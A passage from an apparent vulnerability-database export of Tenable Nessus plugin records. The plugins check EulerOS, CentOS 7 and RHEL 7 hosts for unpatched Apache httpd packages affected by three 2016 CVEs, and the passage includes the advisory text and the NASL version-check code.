It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning.\n (CVE-2016-8743)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-02-12T00:00:00", "id": "EULEROS_SA-2017-1086.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99952", "published": "2017-05-03T00:00:00", "title": "EulerOS 2.0 SP2 : httpd (EulerOS-SA-2017-1086)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99952);\n script_version(\"3.62\");\n script_cvs_date(\"Date: 2019/02/12 9:22:59\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-8743\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : httpd (EulerOS-SA-2017-1086)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the httpd packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the mod_session_crypto module of\n httpd did not use any mechanisms to verify integrity of\n the encrypted session data stored in the user's\n browser. A remote attacker could use this flaw to\n decrypt and modify session data using a padding oracle\n attack. (CVE-2016-0736)\n\n - It was discovered that the mod_auth_digest module of\n httpd did not properly check for memory allocation\n failures. A remote attacker could use this flaw to\n cause httpd child processes to repeatedly crash if the\n server used HTTP digest authentication. (CVE-2016-2161)\n\n - It was discovered that the HTTP parser in httpd\n incorrectly allowed certain characters not permitted by\n the HTTP protocol specification to appear unencoded in\n HTTP request headers. If httpd was used in conjunction\n with a proxy or backend server that interpreted those\n characters differently, a remote attacker could\n possibly use this flaw to inject data into HTTP\n responses, resulting in proxy cache poisoning.\n (CVE-2016-8743)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1086\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8ea4879\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.6-45.0.1.4.h2\",\n \"httpd-devel-2.4.6-45.0.1.4.h2\",\n \"httpd-manual-2.4.6-45.0.1.4.h2\",\n \"httpd-tools-2.4.6-45.0.1.4.h2\",\n \"mod_ssl-2.4.6-45.0.1.4.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:30:38", "bulletinFamily": "scanner", "description": "According to the versions of the httpd packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n - It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n - It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning.\n (CVE-2016-8743)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-02-19T00:00:00", "id": "EULEROS_SA-2017-1085.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99951", "published": "2017-05-03T00:00:00", "title": "EulerOS 2.0 SP1 : httpd (EulerOS-SA-2017-1085)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99951);\n script_version(\"3.54\");\n script_cvs_date(\"Date: 2019/02/19 9:39:25\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-8743\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : httpd (EulerOS-SA-2017-1085)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the httpd packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the mod_session_crypto module of\n httpd did not use any mechanisms to verify integrity of\n the encrypted session data stored in the user's\n browser. A remote attacker could use this flaw to\n decrypt and modify session data using a padding oracle\n attack. (CVE-2016-0736)\n\n - It was discovered that the mod_auth_digest module of\n httpd did not properly check for memory allocation\n failures. A remote attacker could use this flaw to\n cause httpd child processes to repeatedly crash if the\n server used HTTP digest authentication. (CVE-2016-2161)\n\n - It was discovered that the HTTP parser in httpd\n incorrectly allowed certain characters not permitted by\n the HTTP protocol specification to appear unencoded in\n HTTP request headers. If httpd was used in conjunction\n with a proxy or backend server that interpreted those\n characters differently, a remote attacker could\n possibly use this flaw to inject data into HTTP\n responses, resulting in proxy cache poisoning.\n (CVE-2016-8743)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1085\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6733cbc3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.6-45.0.1.4.h2\",\n \"httpd-devel-2.4.6-45.0.1.4.h2\",\n \"httpd-manual-2.4.6-45.0.1.4.h2\",\n \"httpd-tools-2.4.6-45.0.1.4.h2\",\n \"mod_ssl-2.4.6-45.0.1.4.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:30:04", "bulletinFamily": "scanner", "description": "An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack.\n(CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return '400 Bad Request' error to HTTP clients which do not strictly follow HTTP protocol specification. A newly introduced configuration directive 'HttpProtocolOptions Unsafe' can be used to re-enable the old less strict parsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\nBug Fix(es) :\n\n* When waking up child processes during a graceful restart, the httpd parent process could attempt to open more connections than necessary if a large number of child processes had been active prior to the restart. Consequently, a graceful restart could take a long time to complete. With this update, httpd has been fixed to limit the number of connections opened during a graceful restart to the number of active children, and the described problem no longer occurs.\n(BZ#1420002)\n\n* Previously, httpd running in a container returned the 500 HTTP status code (Internal Server Error) when a connection to a WebSocket server was closed. As a consequence, the httpd server failed to deliver the correct HTTP status and data to a client. With this update, httpd correctly handles all proxied requests to the WebSocket server, and the described problem no longer occurs. (BZ#1429947)\n\n* In a configuration using LDAP authentication with the mod_authnz_ldap module, the name set using the AuthLDAPBindDN directive was not correctly used to bind to the LDAP server for all queries. Consequently, authorization attempts failed. The LDAP modules have been fixed to ensure the configured name is correctly bound for LDAP queries, and authorization using LDAP no longer fails.\n(BZ#1420047)", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2017-0906.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99379", "published": "2017-04-14T00:00:00", "title": "CentOS 7 : httpd (CESA-2017:0906)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0906 and \n# CentOS Errata and Security Advisory 2017:0906 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99379);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2018/11/10 11:49:32\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_xref(name:\"RHSA\", value:\"2017:0906\");\n\n script_name(english:\"CentOS 7 : httpd (CESA-2017:0906)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* It was discovered that the mod_session_crypto module of httpd did\nnot use any mechanisms to verify integrity of the encrypted session\ndata stored in the user's browser. A remote attacker could use this\nflaw to decrypt and modify session data using a padding oracle attack.\n(CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. A remote attacker could\nuse this flaw to cause httpd child processes to repeatedly crash if\nthe server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in\nconjunction with a proxy or backend server that interpreted those\ncharacters differently, a remote attacker could possibly use this flaw\nto inject data into HTTP responses, resulting in proxy cache\npoisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return '400\nBad Request' error to HTTP clients which do not strictly follow HTTP\nprotocol specification. A newly introduced configuration directive\n'HttpProtocolOptions Unsafe' can be used to re-enable the old less\nstrict parsing. However, such setting also re-introduces the\nCVE-2016-8743 issue.\n\nBug Fix(es) :\n\n* When waking up child processes during a graceful restart, the httpd\nparent process could attempt to open more connections than necessary\nif a large number of child processes had been active prior to the\nrestart. Consequently, a graceful restart could take a long time to\ncomplete. With this update, httpd has been fixed to limit the number\nof connections opened during a graceful restart to the number of\nactive children, and the described problem no longer occurs.\n(BZ#1420002)\n\n* Previously, httpd running in a container returned the 500 HTTP\nstatus code (Internal Server Error) when a connection to a WebSocket\nserver was closed. As a consequence, the httpd server failed to\ndeliver the correct HTTP status and data to a client. With this\nupdate, httpd correctly handles all proxied requests to the WebSocket\nserver, and the described problem no longer occurs. (BZ#1429947)\n\n* In a configuration using LDAP authentication with the\nmod_authnz_ldap module, the name set using the AuthLDAPBindDN\ndirective was not correctly used to bind to the LDAP server for all\nqueries. Consequently, authorization attempts failed. The LDAP modules\nhave been fixed to ensure the configured name is correctly bound for\nLDAP queries, and authorization using LDAP no longer fails.\n(BZ#1420047)\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-April/022380.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e3877b20\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-45.el7.centos.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-45.el7.centos.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"httpd-manual-2.4.6-45.el7.centos.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-45.el7.centos.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-45.el7.centos.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-45.el7.centos.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-45.el7.centos.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-45.el7.centos.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:30:02", "bulletinFamily": "scanner", "description": "An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack.\n(CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return '400 Bad Request' error to HTTP clients which do not strictly follow HTTP protocol specification. A newly introduced configuration directive 'HttpProtocolOptions Unsafe' can be used to re-enable the old less strict parsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\nBug Fix(es) :\n\n* When waking up child processes during a graceful restart, the httpd parent process could attempt to open more connections than necessary if a large number of child processes had been active prior to the restart. Consequently, a graceful restart could take a long time to complete. With this update, httpd has been fixed to limit the number of connections opened during a graceful restart to the number of active children, and the described problem no longer occurs.\n(BZ#1420002)\n\n* Previously, httpd running in a container returned the 500 HTTP status code (Internal Server Error) when a connection to a WebSocket server was closed. As a consequence, the httpd server failed to deliver the correct HTTP status and data to a client. With this update, httpd correctly handles all proxied requests to the WebSocket server, and the described problem no longer occurs. (BZ#1429947)\n\n* In a configuration using LDAP authentication with the mod_authnz_ldap module, the name set using the AuthLDAPBindDN directive was not correctly used to bind to the LDAP server for all queries. Consequently, authorization attempts failed. The LDAP modules have been fixed to ensure the configured name is correctly bound for LDAP queries, and authorization using LDAP no longer fails.\n(BZ#1420047)", "modified": "2018-11-10T00:00:00", "id": "REDHAT-RHSA-2017-0906.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99340", "published": "2017-04-13T00:00:00", "title": "RHEL 7 : httpd (RHSA-2017:0906)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0906. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99340);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2018/11/10 11:49:56\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_xref(name:\"RHSA\", value:\"2017:0906\");\n\n script_name(english:\"RHEL 7 : httpd (RHSA-2017:0906)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* It was discovered that the mod_session_crypto module of httpd did\nnot use any mechanisms to verify integrity of the encrypted session\ndata stored in the user's browser. A remote attacker could use this\nflaw to decrypt and modify session data using a padding oracle attack.\n(CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. A remote attacker could\nuse this flaw to cause httpd child processes to repeatedly crash if\nthe server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in\nconjunction with a proxy or backend server that interpreted those\ncharacters differently, a remote attacker could possibly use this flaw\nto inject data into HTTP responses, resulting in proxy cache\npoisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return '400\nBad Request' error to HTTP clients which do not strictly follow HTTP\nprotocol specification. A newly introduced configuration directive\n'HttpProtocolOptions Unsafe' can be used to re-enable the old less\nstrict parsing. However, such setting also re-introduces the\nCVE-2016-8743 issue.\n\nBug Fix(es) :\n\n* When waking up child processes during a graceful restart, the httpd\nparent process could attempt to open more connections than necessary\nif a large number of child processes had been active prior to the\nrestart. Consequently, a graceful restart could take a long time to\ncomplete. With this update, httpd has been fixed to limit the number\nof connections opened during a graceful restart to the number of\nactive children, and the described problem no longer occurs.\n(BZ#1420002)\n\n* Previously, httpd running in a container returned the 500 HTTP\nstatus code (Internal Server Error) when a connection to a WebSocket\nserver was closed. As a consequence, the httpd server failed to\ndeliver the correct HTTP status and data to a client. With this\nupdate, httpd correctly handles all proxied requests to the WebSocket\nserver, and the described problem no longer occurs. (BZ#1429947)\n\n* In a configuration using LDAP authentication with the\nmod_authnz_ldap module, the name set using the AuthLDAPBindDN\ndirective was not correctly used to bind to the LDAP server for all\nqueries. Consequently, authorization attempts failed. The LDAP modules\nhave been fixed to ensure the configured name is correctly bound for\nLDAP queries, and authorization using LDAP no longer fails.\n(BZ#1420047)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0736\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-2161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 